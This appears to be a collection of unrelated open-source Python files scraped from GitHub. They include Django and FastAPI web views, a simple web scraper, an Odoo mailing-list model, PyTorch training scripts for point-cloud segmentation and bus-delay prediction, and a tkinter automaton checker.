--output_dir=results/resn-emb2 \\\n --train_dir=/net/scratch/hanliu-shared/data/bm/train \\\n --valid_dir=/net/scratch/hanliu-shared/data/bm/valid \\\n --dataloader_num_workers=4 \\\n --gpus=1 \\\n --seed=42 \\\n --max_epochs=100 \\\n --learning_rate=1e-4 \\\n --vertical_flip=0.5 \\\n --rotate=30 \\\n --scale=0.2 \\\n --train_batch_size=160 \\\n --do_train \\\n --pretrained\"\"\"\n\n # source /opt/conda/etc/profile.d/conda.sh\n # conda activate clinical-bert\n\n # cd /home/chaochunh/investigate-clinicalbert\n\n # srun python -m models.transformers.main \\\n # --task {task} \\\n # --period {period} \\\n # --note_type {note_type} \\\n # --num_labels 2 \\\n # --max_epochs 10 \\\n # --max_seq_length {max_seq_length} \\\n # --segment_len {segment_length} \\\n # --output_dir /net/scratch/chaochunh/investigate-clinicalbert \\\n # --data_dir /net/scratch/chaochunh/test_mimic_output \\\n # --model_name_or_path {model} \\\n # --warmup_steps 1000 \\\n # --cache_dir /net/scratch/chaochunh/transformers \\\n # --train_batch_size 8 \\\n # --eval_batch_size 8 \\\n # --learning_rate {lr} \\\n # --fp16\"\"\"\ns = get_slurm()\ns.run(command)\n# for task, period, note_type in experiments:\n# for 
structured in structured_flag:\n# for balanced in balanced_flag:\n# for model, segment_length in models:\n# for lr in learning_rates:\n# max_seq_length = segment_mapping[segment_length]\n# command = f\"\"\"\n# source /opt/conda/etc/profile.d/conda.sh\n# conda activate clinical-bert\n\n# cd /home/chaochunh/investigate-clinicalbert\n\n# srun python -m models.transformers.main \\\n# --task {task} \\\n# --period {period} \\\n# --note_type {note_type} \\\n# --num_labels 2 \\\n# --max_epochs 10 \\\n# --max_seq_length {max_seq_length} \\\n# --segment_len {segment_length} \\\n# --output_dir /net/scratch/chaochunh/investigate-clinicalbert \\\n# --data_dir /net/scratch/chaochunh/test_mimic_output \\\n# --model_name_or_path {model} \\\n# --warmup_steps 1000 \\\n# --cache_dir /net/scratch/chaochunh/transformers \\\n# --train_batch_size 8 \\\n# --eval_batch_size 8 \\\n# --learning_rate {lr} \\\n# --fp16\"\"\"\n# if balanced:\n# command += \" --balanced\"\n# if structured: \n# command += \" --structured\"\n\n# if train:\n# s = get_slurm(segment_length)\n# command += f\" --gpus {n_gpu}\"\n# command += \" --do_train\"\n# command += \" --overwrite_dir\"\n# job_id = s.run(command)\n# # submit dependent job after training compelete\n# if test:\n# command = command.replace(\" --overwrite_dir\", \"\")\n# command = command.replace(f\" --gpus {n_gpu}\", \" --gpus 1\")\n# command = command.replace(\" --do_train\", \" --do_predict\")\n# command += \" --offline\"\n# s_dependent = get_slurm(segment_length, test=True, dependent_job=job_id)\n# s_dependent.run(command)\n# elif test:\n# s = get_slurm(segment_length, test=True)\n# command += f\" --gpus 1\"\n# command += \" --offline\"\n# command += \" --do_predict\"\n# s.run(command)\n# else:\n # raise(\"Neither train or test is applied.\")","repo_name":"harry-tian/ai-driven-tutorial","sub_path":"models/old/test_slurm_chacha.py","file_name":"test_slurm_chacha.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31084977392","text":"from django.shortcuts import render\nimport markdown\nfrom pathlib import Path\nfrom django.shortcuts import redirect\nfrom app.forms import ContactForm\nfrom django.core.mail import send_mail\nfrom config import settings_local\n\ndef index(request, page):\n\n pages = [\n 'about',\n 'start',\n 'why',\n 'comfort',\n 'legs',\n 'hands',\n 'back',\n 'chest',\n 'shoulders',\n 'head',\n 'exercises',\n 'sources',\n 'contact',\n ]\n\n try:\n\n # check whether submitted page exists\n # in the above list of pages\n pages.index(page)\n\n except:\n\n return redirect('/')\n\n else:\n\n BASE_DIR = Path(__file__).resolve().parent.parent\n path = str(BASE_DIR) + '/templates/articles/' + page + '.mkd'\n mkd_file = open(path, 'r', encoding='utf-8')\n mkd = mkd_file.read()\n html = markdown.markdown(mkd)\n\n context = {\n 'page': page,\n 'html': html,\n }\n\n return render(request, 'article.html', context)\n\n\ndef contact(request):\n \"\"\"Allow the user to send an email to the author.\n\n \"\"\"\n\n if request.method == 'POST':\n\n form = ContactForm(request.POST)\n\n if form.is_valid():\n\n name = form.cleaned_data['name']\n email = form.cleaned_data['email']\n subject = form.cleaned_data['subject']\n message = form.cleaned_data['message']\n\n send_mail(\n 'MP - ' + name + ' ' + subject,\n message,\n email,\n settings_local.AUTHOR,\n fail_silently=False,\n )\n context = {\n 'page': 'contact',\n }\n return render(request, 'contact-success.html', context)\n\n 
else:\n\n form = ContactForm()\n\n context = {\n 'page': 'contact',\n 'form': form,\n }\n\n return render(request, 'contact.html', context)\n","repo_name":"jamescrg/meditation-posture","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25469451702","text":"import re\nimport requests\nfrom requests.exceptions import HTTPError\n\n\ndef get_links(tags_a_raw):\n links = []\n for tag_link in tags_a_raw:\n href = tag_link.split('href=\"')\n link = href[1][:href[1].index('\"')]\n\n if not link in links:\n links.append(link)\n\n return links\n\n\ndef get_images(tags_img_raw):\n images = []\n for tag_image in tags_img_raw:\n src = tag_image.split('src=\"')\n image = src[1][:src[1].index('\"')]\n\n if not image in images:\n images.append(image)\n\n return images\n\n\nif __name__ == '__main__':\n print('*** Web Scraper ***')\n\n url = input(\"Please enter an URL: \").strip()\n\n try:\n response = requests.get(url)\n response.raise_for_status()\n except HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}')\n except Exception as err:\n print(f'Other error occurred: {err}')\n else:\n print(f'GET {url}: SUCCESS')\n decoded_content = response.content.decode()\n\n tag_items = {\n 'link': [],\n 'image': []\n }\n tag_patterns = {\n 'link': {'pattern': '\n# © 2015 Antonio Espinosa \n# © 2015 Javier Iniesta \n# © 2016 Antonio Espinosa - \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom openerp import models, fields, api, _\nfrom openerp.exceptions import ValidationError\n\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n mass_mailing_contact_ids = fields.One2many(\n string=\"Mailing lists\",\n oldname=\"mass_mailing_contacts\",\n domain=[('opt_out', '=', False)],\n comodel_name='mail.mass_mailing.contact', inverse_name='partner_id')\n mass_mailing_contacts_count = fields.Integer(\n string='Mailing list number',\n compute='_compute_mass_mailing_contacts_count', store=True)\n mass_mailing_stats = fields.One2many(\n string=\"Mass mailing stats\",\n comodel_name='mail.mail.statistics', inverse_name='partner_id')\n mass_mailing_stats_count = fields.Integer(\n string='Mass mailing stats number',\n compute='_compute_mass_mailing_stats_count', store=True)\n\n @api.one\n @api.constrains('email')\n def _check_email_mass_mailing_contacts(self):\n if self.mass_mailing_contact_ids and not self.email:\n raise ValidationError(\n _(\"This partner '%s' is subscribed to one or more \"\n \"mailing lists. 
Email must be assigned.\" % self.name))\n\n @api.one\n @api.depends('mass_mailing_contact_ids',\n 'mass_mailing_contact_ids.opt_out')\n def _compute_mass_mailing_contacts_count(self):\n self.mass_mailing_contacts_count = len(self.mass_mailing_contact_ids)\n\n @api.one\n @api.depends('mass_mailing_stats')\n def _compute_mass_mailing_stats_count(self):\n self.mass_mailing_stats_count = len(self.mass_mailing_stats)\n\n @api.multi\n def write(self, vals):\n res = super(ResPartner, self).write(vals)\n if vals.get('name') or vals.get('email'):\n mm_vals = {}\n if vals.get('name'):\n mm_vals['name'] = vals['name']\n if vals.get('email'):\n mm_vals['name'] = vals['email']\n self.env[\"mail.mass_mailing.contact\"].search([\n (\"partner_id\", \"in\", self.ids),\n ]).write(mm_vals)\n return res\n","repo_name":"ateneolab/odoo-dev","sub_path":"mass_mailing_partner/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27267845966","text":"from fastapi import status, HTTPException, APIRouter\nimport psycopg2\n\nfrom src.utils.config import ConfigParser\nfrom src.repository.posts import (\n InMemoryPostRepository, PostgreSQLPostRepository, PostgresPostSQLQueries\n)\nfrom src.schemas import PostCreate\n\n# This was done before the Foreign Key restriction on the Post table\n\nrouter = APIRouter(\n prefix=\"/repository/posts\",\n tags=[\"Repository\"]\n)\n\n# environment\nconfig = ConfigParser()\nenv = config.get_env()\nselected_repository = config.get_data(paths=[\"REPOSITORY\"])\n\n\n# select repository\nif selected_repository == 'POSTGRES':\n connection_data = config.get_data(paths=[\"DATABASE\", env, \"CONNECTION\"])\n repository = PostgreSQLPostRepository(\n connection_data=connection_data,\n connection_handler=psycopg2,\n queries=PostgresPostSQLQueries()\n )\nelse:\n repository = InMemoryPostRepository()\n\n\n# Using repository\n@router.get(\"/\", status_code=status.HTTP_200_OK)\ndef read_all():\n data = repository.read_all()\n return data\n\n\n@router.get(\"/{id}\")\ndef read_one(id: int):\n data = repository.read_one(id)\n if not data:\n raise_inexistent(id)\n return data\n\n\n@router.post(\"/\")\ndef create(payload: PostCreate):\n repository.create(payload)\n return payload\n\n\n@router.delete(\"/{id}\", status_code=status.HTTP_204_NO_CONTENT)\ndef delete(id: int):\n repository.delete(id)\n\n\n@router.put(\"/{id}\")\ndef update(id: int, payload: PostCreate):\n try:\n repository.update(id, payload)\n return payload\n except KeyError as e:\n raise_inexistent(id)\n\ndef raise_inexistent(id: int, status_code: int = status.HTTP_404_NOT_FOUND):\n raise HTTPException(\n status_code=status_code,\n detail=f\"id {id} does not exist for posts\"\n )","repo_name":"iamlucasmateo/fcc-fast-api","sub_path":"src/routers/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16019898708","text":"from django.shortcuts import render\n\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import datetime, timezone, timedelta\n\nfrom .models import User, Member, Group, Goal\nfrom .forms import GroupForm, GoalForm\n\n# Create your 
views here.\ndef index(request):\n\n # Authenticated users view their inbox\n if request.user.is_authenticated:\n\n user = request.user \n group = Member.objects.get(user=user).group\n group_name = groups = None\n if group:\n group_name = group.name\n else:\n groups = list(Group.objects.values_list('name', flat=True))\n\n members_count = Member.objects.filter(group=group).count()\n completed_goals_count = Goal.objects.filter(group=group, completed=True).count()\n\n user_winnings = 0 # this is if no group, no goal set or goal not completed, otherwise value will be modified later below\n user_completed = None\n\n try:\n goal = Goal.objects.get(setter=user)\n except:\n goal = goal_name = time_left = stake = None\n \n time_left = None\n if goal:\n goal_name = goal.name\n created_month = goal.creation.month\n now = datetime.now(timezone.utc)\n stake = goal.stake\n user_completed = goal.completed\n\n # TEST results and completion view - change minute count to whenever you will be ready to test\n # test_time = datetime(now.year,now.month,now.day,now.hour,32,tzinfo=timezone.utc)\n # print(\"is there time left?\", now<=test_time)\n # if now<=test_time: # NOT TIME YET\n\n if now.month==created_month:\n next_month = datetime(now.year,now.month+1,1,tzinfo=timezone.utc)\n time_left = next_month-now\n print(\"Has user completed goal?\", user_completed)\n\n else: # TIME TO SHOW\n time_left = 0\n \n if user_completed:\n uncompleted_goals = Goal.objects.filter(group=group, completed=False)\n uncompleted_stakes = 0\n for goal in uncompleted_goals:\n uncompleted_stakes += goal.stake\n divided_winnings = uncompleted_stakes/completed_goals_count\n user_winnings = goal.stake + divided_winnings\n \n\n return render(request, \"goalwin/index.html\", {\n \"group\": group_name,\n \"groups\": groups,\n \"goal\": goal_name,\n \"time_left\": time_left,\n \"stake\": stake,\n \"total_members\":members_count,\n \"completed_members\":completed_goals_count,\n \"user_completed\": user_completed,\n \"user_winnings\": user_winnings,\n })\n\n # Everyone else is prompted to sign in\n else:\n return HttpResponseRedirect(reverse(\"login\"))\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"goalwin/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"goalwin/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"goalwin/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n\n except IntegrityError:\n return render(request, \"goalwin/register.html\", {\n \"message\": \"Username already taken.\"\n })\n \n person = Member(username=username, user=user)\n person.save()\n\n login(request, user)\n return 
HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"goalwin/register.html\")\n \n\n@login_required\ndef create_group(request):\n \n if request.method==\"GET\":\n return render(request, \"GoalWin/newgroup.html\", {\n \"groupform\" : GroupForm()\n })\n\n if request.method==\"POST\":\n name = request.POST.get('name')\n desc = request.POST.get('desc')\n admin = request.user\n\n group = Group(name=name, desc=desc, admin=admin)\n group.save()\n\n member = Member.objects.get(user=request.user)\n member.group = group\n member.save()\n\n return HttpResponseRedirect(reverse(\"index\"))\n \n@login_required\ndef join_group(request, joining_group):\n\n if request.method==\"GET\":\n member = Member.objects.get(user=request.user)\n group = Group.objects.get(name=joining_group)\n member.group = group\n member.save()\n\n return HttpResponseRedirect(reverse(\"index\"))\n\n@login_required\ndef create_goal(request):\n\n if request.method==\"GET\":\n return render(request, \"GoalWin/newgoal.html\", {\n \"goalform\" : GoalForm()\n })\n\n if request.method==\"POST\":\n name = request.POST.get('name')\n desc = request.POST.get('desc')\n stake = request.POST.get('stake')\n setter = request.user\n\n member = Member.objects.get(user=request.user)\n group = member.group\n \n print(member)\n print(group)\n\n goal = Goal(name=name, desc=desc, stake=stake, setter=setter, group=group)\n goal.save()\n\n return HttpResponseRedirect(reverse(\"index\"))\n\n@login_required\ndef goal_completed(request):\n \n if request.method==\"GET\":\n goal = Goal.objects.get(setter=request.user) # if user can join multiple groups, add group=group condition\n goal.completed = True\n goal.save()\n\n return HttpResponseRedirect(reverse(\"index\"))","repo_name":"Tarctic/GoalWin","sub_path":"projectGoalWin/GoalWin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4823796000","text":"# parse a substance file and configure a waq_scenario accordingly\n\nimport logging\nimport stompy.model.delft.io as dio\nfrom stompy.model.delft import waq_scenario\n\n##\n\nlog=logging.getLogger('substance_file')\n\nfn=\"SFB_pars.sub\"\n\nhydro=waq_scenario.Hydro()\nscen=waq_scenario.Scenario(hydro=hydro)\n\n# def load_substance_file(fn):\n##\n\nfp=open(fn,'r')\ngen=dio.inp_tok(fp)\ntok=lambda: next(gen)\n\ndef nv_pairs(stop_on):\n pairs={}\n while 1:\n tag=tok()\n if tag==stop_on:\n break\n else:\n # name-value pair\n name=tag\n value=tok().strip(\"'\")\n pairs[name]=value\n return pairs\n \nwhile 1:\n try:\n blk=tok()\n except StopIteration:\n break\n if blk=='substance':\n sub_name=tok().strip(\"'\")\n activivity=tok()\n sub_attrs=nv_pairs(stop_on='end-substance')\n # scen.substances[name]=Substance(active=(activity=='active'))\n elif blk=='parameter':\n par_name=tok().strip(\"'\")\n par_attrs=nv_pairs(stop_on='end-parameter')\n if 'value' in par_attrs:\n # scen.parameters[par_name]=PC(float(par_attrs['value']))\n pass\n else:\n log.warning(\"Not sure how to deal with %s\"%(par_attrs))\n elif blk=='output':\n out_var=tok().strip(\"'\")\n out_attrs=nv_pairs(stop_on='end-output')\n # scen.map_output += (out_var,)\n # scen.hist_output += (out_var,)\n elif blk=='active-processes':\n while 1:\n tag=tok()\n if tag=='end-active-processes':\n break\n elif tag=='name':\n proc_name=tok().strip(\"'\")\n proc_desc=tok().strip(\"'\")\n # scen.parameters['ACTIVE_%s'%proc_name]=1\n else:\n log.warning(\"What is 
%s\"%tag)\n else:\n log.warning(\"Skipping %s\"%blk)\n","repo_name":"rustychris/sfbay_npzd","sub_path":"dev_sub_file.py","file_name":"dev_sub_file.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72886409183","text":"from legislative_act import model as dm\n\n\ns = dm.Search()\ns = s.filter(\"term\", doc_type=\"versionsmap\")\nfor hit in s.scan():\n try:\n availabilities = hit[\"availabilities\"]\n except KeyError:\n availabilities = []\n latest_cover_id = None\n else:\n latest_version = availabilities[-1].version\n try:\n latest_cover_id = [\n i\n for i in hit[\"exposed_and_hidden\"]\n if i[\"sub_id\"] == \"COV\" and latest_version in i[\"exposed_versions\"]\n ][0]\n except IndexError:\n print(hit.meta.id, flush=True)\n","repo_name":"Lexparency/lexhost","sub_path":"scripts/py/find/uncovered.py","file_name":"uncovered.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"19782232323","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 13 22:14:45 2019\n\n@author: yj\n\"\"\"\n\nimport numpy as np\n\n\n\nimport torch\n\nimport torch.nn as nn\n\nimport torch.nn.functional as F\n\nimport torch.optim as optim\n\nfrom torchvision import datasets, transforms\n\nimport torch.backends.cudnn as cudnn\n\n\n\nfrom imdb.dataset1 import *\n\nfrom config.kitti_squeezeSeg_config import *\nfrom pointSegNet import *\nfrom squeezeSeg import *\n#from pointSegNet1 import *\nfrom util import *\nimport Loss\n\n\n\nfrom tensorboardX import SummaryWriter\n\nargs={'csv_path':'/home/Job/ImageSet/csv/','data_path':'/home/Job/lidar_2d/','model_path':'./model',\n 'lr':1e-3,'momentum':0.9,'weight_decay': 5e-4,'lr_step': 1000, 'lr_gamma':0.1, 'epochs':8,\n 'start_epoch':0, 'pretrain':True, 'resume':True, 'gpu_ids':[0,1], 'batch_size':10}\n\nwriter=SummaryWriter()\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef train(model, train_loader, criterion, optimizer, epoch):\n model.train()\n lovasz=False\n total_loss=0\n total_size =0\n total_tp = np.zeros(mc.NUM_CLASS)\n total_fp = np.zeros(mc.NUM_CLASS)\n total_fn = np.zeros(mc.NUM_CLASS) \n print(len(train_loader))\n for batch_idx, datas in enumerate(train_loader):\n # trying to overfit a small data\n # if idx==100:\n # break\n inputs, mask, labels, weight = datas\n inputs, mask, labels, weight = \\\n inputs.to(device), mask.to(device), labels.to(device), weight.to(device)\n optimizer.zero_grad() \n outputs=model(inputs)\n\n # _ is what?\n \n _, predicted=torch.max(outputs.data, 1)\n loss=criterion(outputs, labels, mask, weight, lovasz)\n\n writer.add_scalar('data/loss', loss/args['batch_size'], batch_idx*(epoch+1))\n loss.backward()\n optimizer.step()\n \n tp, fp, fn = evaluate(labels, predicted, mc.NUM_CLASS)\n \n total_tp += tp\n total_fp += fp\n total_fn += fn \n \n total_loss+=loss.item()\n total_size += inputs.size(0)\n \n if batch_idx % 800 == 0:\n #now = datetime.datetime.now()\n\n print(f'[1] Train Epoch: {epoch} [{batch_idx * len(inputs)}/{len(train_loader.dataset)} ({100. 
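The .sub parser above leans on stompy's `dio.inp_tok` (and stores the active/inactive token in a variable misspelled `activivity`). A self-contained sketch of the same `nv_pairs` idea with a naive whitespace tokenizer; unlike the real tokenizer it ignores quoting, so it only handles single-token quoted values:

def tokens(text):
    # toy stand-in for dio.inp_tok: yield whitespace-separated tokens
    for line in text.splitlines():
        for t in line.split():
            yield t

def nv_pairs(gen, stop_on):
    pairs = {}
    for tag in gen:
        if tag == stop_on:
            break
        pairs[tag] = next(gen).strip("'")
    return pairs

gen = tokens("description 'oxygen' unit 'gO2/m3' end-substance")
print(nv_pairs(gen, "end-substance"))  # {'description': 'oxygen', 'unit': 'gO2/m3'}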
* batch_idx / len(train_loader):.0f}%)]\\tAverage loss: {total_loss / total_size:.6f}')\n #print(f'iou={Loss.NormalLoss.iou(predicted, labels)}')\n # TensoorboardX Save Input Image and Visualized Segmentation\n #writer.add_image('Input/Image/', (img_normalize(inputs[0, 3, :, :])).cpu(), batch_idx * (epoch+1))\n\n #writer.add_image('Predict/Image/', visualize_seg(predicted, mc)[0], batch_idx * (epoch+1))\n\n #writer.add_image('Target/Image/', visualize_seg(targets, mc)[0], batch_idx * (epoch+1))\n iou = total_tp / (total_tp+total_fn+total_fp+1e-12)\n precision = total_tp / (total_tp+total_fp+1e-12)\n recall = total_tp / (total_tp+total_fn+1e-12)\n\n print()\n print_evaluate(mc, 'IoU', iou)\n print_evaluate(mc, 'Precision', precision)\n print_evaluate(mc, 'Recall', recall)\n print()\n \n total_tp = np.zeros(mc.NUM_CLASS)\n total_fp = np.zeros(mc.NUM_CLASS)\n total_fn = np.zeros(mc.NUM_CLASS)\n \n if total_loss / total_size<=0.1:\n print(total_loss, total_size)\n lovasz=True\n \n\ndef test(mc, model, val_loader, epoch):\n\n model.eval()\n\n total_tp = np.zeros(mc.NUM_CLASS)\n total_fp = np.zeros(mc.NUM_CLASS)\n total_fn = np.zeros(mc.NUM_CLASS)\n\n with torch.no_grad():\n for batch_idx, datas in enumerate(val_loader):\n inputs, mask, targets, weight = datas\n inputs, mask, targets, weight = \\\n inputs.to(device), mask.to(device), targets.to(device), weight.to(device)\n\n outputs = model(inputs, mask)\n\n _, predicted = torch.max(outputs.data, 1)\n\n tp, fp, fn = evaluate(targets, predicted, mc.NUM_CLASS)\n \n total_tp += tp\n total_fp += fp\n total_fn += fn\n\n iou = total_tp / (total_tp+total_fn+total_fp+1e-12)\n precision = total_tp / (total_tp+total_fp+1e-12)\n recall = total_tp / (total_tp+total_fn+1e-12)\n\n print()\n print_evaluate(mc, 'IoU', iou)\n print_evaluate(mc, 'Precision', precision)\n print_evaluate(mc, 'Recall', recall)\n print()\n\n\nif __name__=='__main__':\n torch.cuda.set_device(2)\n # torch.backends.cudnn.benchmark = True\n mc=kitti_squeezeSeg_config()\n \n if os.path.exists(args['model_path']) is False:\n os.mkdir(args['model_path'])\n \n train_datasets=KittiDataset(\n mc,\n csv_file=args['csv_path']+'train.csv',\n root_dir=args['data_path'],\n transform=transforms.Compose([transforms.ToTensor()])\n )\n train_dataloader=torch.utils.data.DataLoader(\n train_datasets,\n batch_size=args['batch_size'],\n shuffle=True,\n num_workers=0\n )\n print(len(train_dataloader))\n val_datasets=KittiDataset(\n mc,\n csv_file=args['csv_path']+'val.csv',\n root_dir=args['data_path'],\n transform=transforms.Compose([transforms.ToTensor()])\n )\n \n val_dataloader=torch.utils.data.DataLoader(\n val_datasets,\n batch_size=args['batch_size'],\n shuffle=True,\n num_workers=0\n )\n \n model=SqueeOri(mc).to(device)\n # model=SqueezeSeg(mc).to(device)\n \n criterion=Loss.NormalLoss(mc)\n \n optimizer=optim.SGD(model.parameters(), lr=args['lr'], momentum=args['momentum'], weight_decay=args['weight_decay'])\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=args['lr_step'], gamma=args['lr_gamma'])\n\n model.cuda()\n \n for epoch in range(args['start_epoch'], args['epochs']):\n scheduler.step()\n print('-------------------------------------------------------------------')\n train(model, train_dataloader, criterion, optimizer, epoch)\n \n print('-------------------------------------------------------------------')\n print()\n\n\n 
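A quick numeric check of the IoU/precision/recall formulas printed by train() and test() above (the per-class tp/fp/fn counts are made up):

import numpy as np

tp, fp, fn = np.array([50.0, 10.0]), np.array([5.0, 2.0]), np.array([10.0, 3.0])
iou = tp / (tp + fn + fp + 1e-12)
precision = tp / (tp + fp + 1e-12)
recall = tp / (tp + fn + 1e-12)
print(iou)        # [0.7692... 0.6666...]
print(precision)  # [0.9090... 0.8333...]
print(recall)     # [0.8333... 0.7692...]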
writer.close()\n","repo_name":"BenjaminYoung29/PointSegPytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"39830137896","text":"import argparse\nimport os\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom .data_views import get_data_loaders\nfrom .modules.FullHistory import FullHistory\n\nfrom .utils import create_output_folder\n\ndef run_loop(model, dl, loss_func, step=False, optimizer=None):\n total_loss = 0\n for trip, hist, y in dl:\n pred = model(trip, hist)\n loss = loss_func(pred, y)\n\n if step:\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n total_loss += loss\n\n return (total_loss / len(dl)).item()\n\ndef get_predictions(model, dl):\n model.eval()\n with torch.no_grad():\n trips = []\n hists = []\n preds = []\n ys = []\n for trip, hist, y in dl:\n trips.append(trip)\n hists.append(hist)\n ys.append(y)\n preds.append(model(trip, hist))\n return torch.cat(trips), torch.cat(hists), torch.cat(ys), torch.cat(preds)\n\ndef graph_results(model, dl):\n trips, hists, ys, preds = get_predictions(model, dl)\n plt.ioff()\n absolute_errors = (preds-ys).reshape(-1).numpy()\n plt.hist(absolute_errors, bins=50)\n create_output_folder(\"plots\")\n plt.savefig(\"output/plots/absolute_errors.png\")\n\ndef run_experiment(\n encode_hist=True,\n loss='mse',\n l1_beta=10,\n learning_rate=1e-3,\n epochs=50,\n batch_size=16,\n dropout_rate=0,\n num_layers=4,\n layer_size=32,\n quick=False):\n\n writer = SummaryWriter()\n train_dl, test_dl = get_data_loaders(batch_size=batch_size, quick=quick)\n\n # Set loss func\n loss_funcs = {\n 'mse': nn.MSELoss(),\n 'mae': nn.L1Loss(),\n 'smoothl1': nn.SmoothL1Loss(beta=l1_beta),\n }\n loss_func = loss_funcs[loss]\n\n model = FullHistory(encode_hist=encode_hist, dropout_rate=dropout_rate, num_layers=num_layers, layer_size=layer_size)\n opt = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n for epoch in range(epochs):\n model.train()\n train_loss = run_loop(model, train_dl, loss_func, step=True, optimizer=opt)\n\n model.eval()\n with torch.no_grad():\n mse_loss = run_loop(model, test_dl, loss_funcs['mse'])\n mae_loss = run_loop(model, test_dl, loss_funcs['mae'])\n\n writer.add_scalar(\"Loss/train\", train_loss, epoch)\n writer.add_scalar(\"Loss/test/mse\", mse_loss, epoch)\n writer.add_scalar(\"Loss/test/mae\", mae_loss, epoch)\n print(f\"Epoch {epoch}:\\t training: {train_loss:,.1f}\\t mse: {mse_loss:,.1f} \\t mae: {mae_loss:,.1f}\")\n\n if not quick:\n if not os.path.exists(\"output\"):\n os.mkdir(\"output\")\n graph_results(model, test_dl)\n create_output_folder(\"params\")\n torch.save(model.state_dict(), \"output/params/full_history.pt\")\n\n\nif __name__ == \"__main__\":\n p = argparse.ArgumentParser()\n\n # Network structure\n p.add_argument(\"--encode_hist\", default=True, action=argparse.BooleanOptionalAction)\n p.add_argument(\"--num_layers\", type=int, default=4)\n p.add_argument(\"--layer-size\", type=int, default=32)\n p.add_argument(\"--dropout-rate\", type=float, default=0.5)\n\n # Optimizer\n p.add_argument(\"--learning-rate\", type=float, default=0.001)\n p.add_argument(\"--loss\", choices=[\"mse\", \"mae\", \"smoothl1\"], default=\"mse\")\n p.add_argument(\"--l1-beta\", type=float, 
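The epoch loop above calls scheduler.step() before training each epoch; since PyTorch 1.1 the convention is to step the scheduler after the optimizer, at the end of the epoch. A minimal runnable sketch of the ordering (toy model, no data):

from torch import nn, optim

model = nn.Linear(4, 2)
optimizer = optim.SGD(model.parameters(), lr=1e-3, momentum=0.9)
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=1000, gamma=0.1)

for epoch in range(3):
    # ... per-batch loss.backward() / optimizer.step() calls run here ...
    optimizer.step()   # stand-in for the epoch's final optimizer step
    scheduler.step()   # then advance the learning-rate schedule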
default=10)\n\n # Training\n p.add_argument(\"--batch-size\", type=int, default=16)\n p.add_argument(\"--epochs\", type=int, default=50)\n\n p.add_argument('--quick', action=\"store_true\")\n\n args = p.parse_args()\n\n if args.quick:\n args.epochs = 2\n\n run_experiment(\n **vars(args)\n )\n","repo_name":"NixGD/bus-predictions","sub_path":"src/encoding_run.py","file_name":"encoding_run.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18784365978","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import filedialog as fd\nfrom controllers.controller import Controller\n\nclass View:\n def __init__(self, controller = Controller):\n self.controller = controller\n\n def VerifyString(self):\n input_str = self.input_entry.get()\n\n is_accepted, error = self.controller.CheckString(input_str)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al verificar la cadena: \" + error)\n elif is_accepted:\n messagebox.showinfo(\"Resultado\", \"La cadena '\" + input_str + \"' es aceptada por el autómata\")\n else:\n messagebox.showinfo(\"Resultado\", \"La cadena '\" + input_str + \"' no es aceptada por el autómata\")\n\n def LoadAutomataFromFile(self):\n filepath = fd.askopenfilename(filetypes=[(\"JSON Files\", \"*.json\")])\n if filepath:\n error = self.controller.LoadAutomataFromFile(filepath)\n if error is not None:\n messagebox.showerror(\"Error\", \"Error al cargar el archivo: \" + error)\n else:\n 